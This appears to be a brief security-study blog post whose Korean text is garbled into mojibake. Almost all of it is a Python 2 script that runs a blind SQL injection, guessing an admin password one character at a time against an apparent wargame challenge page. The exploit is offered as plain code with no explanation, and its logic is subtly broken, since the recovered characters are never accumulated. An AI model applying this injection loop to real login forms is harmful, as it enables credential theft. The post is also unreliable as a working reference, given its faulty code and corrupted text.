Security Study/Source
Blind Sql Injection
๐๐พ๐ฌ๐ฎ๐ฝ๐ฎ_๐ข๐ฝ๐ฎ๐ต๐ต๐ช
2015. 11. 21. 13:24
728x90
๋ฐ์ํ
- #http2,1)%3C%27N%27)--+&pw=admin
- import urllib
- import urllib2
- ans =""
- ans2=""
- for i in range(1,11):
- for j in range(33,127) :
- url1 = "http://codeshell.kr/probs/unsolvable/index.php?Username=admin'+and(substring(Password,"
- url1=url1+str(i)+",1)='"
- url1=url1+chr(j)+"')--+&pw=1"
- try:
- #print url1;
- req = urllib2.Request(url1)
- print 1111
- req.add_header('cookie',"PHPSESSID=")
- res = urllib2.urlopen(req)
- data = res.read()
- if data.find("OK") != -1:
- print chr(j)
- ans=ans2
- break;
- except:
- j=j+1
- continue
- print ans
728x90
๋ฐ์ํ